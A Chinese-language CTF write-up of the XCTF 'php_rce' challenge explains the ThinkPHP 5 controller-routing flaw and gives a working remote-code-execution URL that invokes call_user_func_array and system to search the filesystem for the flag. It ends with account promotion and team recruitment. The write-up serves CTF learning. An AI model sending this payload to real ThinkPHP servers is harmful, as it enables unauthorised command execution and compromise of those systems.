攻防世界學習記錄-Web高手區(三)
題目:php_rec
區域:高手區
平臺:攻防世界
題目提示資訊:暫無
解題思路
拿到題目,下發環境。
我們先看看題
發現是ThinkPHP,這個框架的V5是出了名的對底層控制器名過濾不嚴格,那麼我們可以透過URL呼叫到ThinkPHP框架內部的敏感函式,進而導致GetShell漏洞。
http://111。200。241。244:51903/index。php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22
上手就是一頓幹
Catflag
得到了flag
flag
題感
這道題是一道比較簡單的Web題目,我們所需要的東西有下:
1。Web網站基礎
2。PHP基礎
寫到後面
大家可以關注一下我們的公眾號,如果覺得這個文章有用的話,可以推薦給你的朋友或者轉發到朋友圈分享一下。你的分享、你的點贊、你的每一次瀏覽,都將是我持續更新的動力。非常感謝看到文章的每一個人!
另外,CTF團隊也在持續招人,如果有意向的可以與我聯絡,公眾號內直接透過選單獲取資訊即可!